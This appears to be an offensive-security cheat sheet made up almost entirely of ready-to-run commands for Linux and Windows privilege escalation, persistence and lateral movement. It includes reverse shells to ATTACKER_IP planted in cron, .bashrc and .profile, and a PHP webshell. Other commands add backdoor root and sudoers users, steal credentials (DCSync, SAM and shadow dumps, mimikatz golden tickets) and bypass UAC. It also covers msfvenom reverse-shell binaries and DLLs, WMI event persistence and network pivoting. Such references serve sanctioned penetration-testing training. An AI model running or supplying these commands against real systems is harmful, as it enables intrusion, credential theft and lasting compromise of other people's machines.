Privilege escalation, persistence, and lateral movement. From low-priv shell to domain dominance.
LinPEAS / WinPEAS — map the attack surface from inside.
SUID, sudo, tokens, weak perms, kernel exploits.
SSH keys, services, cron, WMI, tickets.
Ligolo-ng, Chisel, SSH tunnels, lateral movement.
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh && ./LinEnum.sh
# Linux Exploit Suggester
wget https://raw.githubusercontent.com/The-Z-Labs/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh && ./linux-exploit-suggester.sh
# DirtyPipe (CVE-2022-0847)
gcc -o dirtypipe dirtypipe.c && ./dirtypipe /etc/passwd
# DirtyCow (CVE-2016-5195)
gcc -pthread dirty.c -o dirty -lcrypt && ./dirty newpassword
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Check sudo permissions
sudo -l
# SUID find
find . -exec /bin/sh \; -quit
# sudo vim
sudo vim -c ':!/bin/bash'
# sudo awk
sudo awk 'BEGIN {system("/bin/bash")}'
# SUID bash
bash -p
# sudo nmap (older versions)
echo "os.execute('/bin/bash')" > /tmp/nmap.script
sudo nmap --script=/tmp/nmap.script
ls -la /etc/passwd /etc/shadow
# /etc/passwd writable — add root user
echo 'hacker:$(openssl passwd -1 password123):0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker
# /etc/shadow readable — crack hashes
unshadow /etc/passwd /etc/shadow > hashes.txt
hashcat -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
cat ~/.bash_history
cat /home/*/.bash_history
cat /root/.bash_history
grep -i "pass\|secret\|key\|token\|ssh\|sudo" ~/.bash_history
# Enumerate cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
cat /var/spool/cron/crontabs/root
# Writable cron script — inject reverse shell
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /path/to/cron_script.sh
# Linux Capabilities
getcap -r / 2>/dev/null
# python3 with cap_setuid
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# perl with cap_setuid
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
ssh-keygen -t rsa -b 4096 -f /tmp/backdoor_key -N ""
mkdir -p /root/.ssh
cat /tmp/backdoor_key.pub >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
ssh -i /tmp/backdoor_key root@TARGET_IP
useradd -m -s /bin/bash backdooruser
echo "backdooruser:Password123!" | chpasswd
usermod -aG sudo backdooruser
# Direct sudoers entry
echo "backdooruser ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
# Every minute, every hour, every day
(crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'") | crontab -
crontab -l
# .bashrc / .profile backdoor
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> ~/.bashrc
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> ~/.profile
# PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/shell.php
curl http://TARGET_IP/shell.php?cmd=id
# WinPEAS
certutil -urlcache -split -f https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe winpeas.exe
.\winpeas.exe
# PowerUp
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 -UseBasicParsing); Invoke-AllChecks
# Manual checks
whoami /all
whoami /priv
net user
net localgroup administrators
systeminfo
wmic qfe list brief # installed patches
# On target
systeminfo > systeminfo.txt
# On attacker
pip install xlrd==1.2.0
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo systeminfo.txt
whoami /priv # look for SeImpersonatePrivilege
# Juicy Potato
.\JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c whoami" -t *
# PrintSpoofer
.\PrintSpoofer.exe -i -c cmd
# GodPotato
.\GodPotato.exe -cmd "cmd /c whoami"
# Sweet Potato
.\SweetPotato.exe -a whoami
# Kerberoasting
GetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP -request
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
# DCSync with mimikatz
.\mimikatz.exe "lsadump::dcsync /domain:DOMAIN /user:krbtgt" "exit"
.\mimikatz.exe "lsadump::dcsync /domain:DOMAIN /all" "exit"
# DCSync with impacket
secretsdump.py DOMAIN/user:password@DC_IP
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Look for: DefaultUserName, DefaultPassword, AltDefaultPassword
Get-UnattendedInstallFile
Get-WebConfig
Get-ApplicationHost
# UACME (Akagi)
.\Akagi64.exe 23 C:\Windows\System32\cmd.exe
# FodHelper method
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -name "(default)" -value "cmd /c start cmd.exe" -Force
New-ItemProperty -Path "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
# Save registry hives on target
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
reg save HKLM\SECURITY C:\Temp\SECURITY
# Offline dump on attacker
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
# Live dump via SMB
impacket-secretsdump DOMAIN/user:password@TARGET_IP
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o service_backdoor.exe
sc create BackdoorSvc binpath= "C:\Temp\service_backdoor.exe" start= auto
sc start BackdoorSvc
# PowerShell
New-Service -Name "BackdoorSvc" -BinaryPathName "C:\Temp\service_backdoor.exe" -StartupType Automatic
Start-Service "BackdoorSvc"
# Golden Ticket — needs krbtgt hash
.\mimikatz.exe "kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /ptt" "exit"
# Silver Ticket — needs service account hash
.\mimikatz.exe "kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN_SID /target:server.domain.com /service:cifs /rc4:SERVICE_HASH /ptt" "exit"
# Diamond Ticket (impacket)
ticketer.py -nthash KRBTGT_HASH -domain-sid DOMAIN_SID -domain DOMAIN -request -user Administrator diamond_ticket
# Pass-the-Ticket
.\mimikatz.exe "kerberos::ptt ticket.kirbi" "exit"
klist
$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{
Name = "PersistFilter"; EventNameSpace = "root/cimv2"; QueryLanguage = "WQL"
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}
$consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{
Name = "PersistConsumer"; CommandLineTemplate = "cmd.exe /c C:\Temp\backdoor.exe"
}
Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{
Filter = $filter; Consumer = $consumer
}
# Via impacket
wmiexec.py DOMAIN/user:password@TARGET_IP
# Find hijackable DLLs
Find-PathDLLHijack
Find-ProcessDLLHijack
# Compile malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o malicious.dll
# Drop in searchable path
copy malicious.dll C:\some\writable\path\legit.dll
# Inject with PowerSploit
Invoke-DllInjection -ProcessID <PID> -Dll C:\Temp\malicious.dll
Invoke-ReflectivePEInjection -PEPath C:\Temp\malicious.dll -ProcId <PID>
# Local port forward
ssh -L LOCAL_PORT:TARGET_HOST:TARGET_PORT user@JUMP_HOST
# Dynamic port forward (SOCKS proxy)
ssh -D 1080 user@JUMP_HOST
proxychains nmap -sT TARGET_IP
# Remote port forward
ssh -R REMOTE_PORT:localhost:LOCAL_PORT user@ATTACKER_IP
# Attacker (server)
./chisel server -p 8080 --reverse
# Target (client)
./chisel client ATTACKER_IP:8080 R:socks
# Use with proxychains
# /etc/proxychains.conf → socks5 127.0.0.1 1080
proxychains nmap -sT -p 22,80,443 INTERNAL_IP
# Attacker — start proxy
./proxy -selfcert -laddr 0.0.0.0:11601
# Target — connect agent
./agent -connect ATTACKER_IP:11601 -ignore-cert
# In ligolo UI
session # select session
start # start tunnel
# Add route to internal network
ip route add 172.16.0.0/24 dev ligolo
# Double pivot — agent on second host
./agent -connect ATTACKER_IP:11601 -ignore-cert
# SMB lateral movement
impacket-smbexec DOMAIN/user:password@TARGET_IP
impacket-psexec DOMAIN/user:password@TARGET_IP
# WinRM
evil-winrm -i TARGET_IP -u user -p password
# Pass-the-Hash
impacket-psexec DOMAIN/user@TARGET_IP -hashes :NTLM_HASH
crackmapexec smb TARGET_IP -u user -H NTLM_HASH --exec-method smbexec
# RDP through SOCKS
proxychains xfreerdp /v:TARGET_IP /u:user /p:password
# WMI
wmiexec.py DOMAIN/user:password@TARGET_IP "whoami"
| Task | Tool | Key Command |
|---|---|---|
| Linux enum | linpeas | curl -L linpeas.sh | sh |
| Find SUID bins | find | find / -perm -4000 -type f 2>/dev/null |
| Sudo privesc | GTFOBins | sudo -l → gtfobins.github.io |
| Capabilities | getcap | getcap -r / 2>/dev/null |
| Crack shadow | hashcat | -m 1800 hashes.txt rockyou.txt |
| Windows enum | winpeas | .\winpeas.exe |
| Token abuse | GodPotato | .\GodPotato.exe -cmd "cmd /c whoami" |
| DCSync | mimikatz | lsadump::dcsync /domain:X /user:krbtgt |
| SAM dump | secretsdump | -sam SAM -system SYSTEM LOCAL |
| Golden ticket | mimikatz | kerberos::golden /krbtgt:HASH /ptt |
| WMI exec | wmiexec.py | DOMAIN/user:pass@TARGET |
| SOCKS proxy | chisel | server -p 8080 --reverse |
| Tunnel | ligolo-ng | proxy -selfcert / agent -connect |
| Pass-the-Hash | crackmapexec | -u user -H NTLM_HASH |
| WinRM access | evil-winrm | -i TARGET -u user -p pass |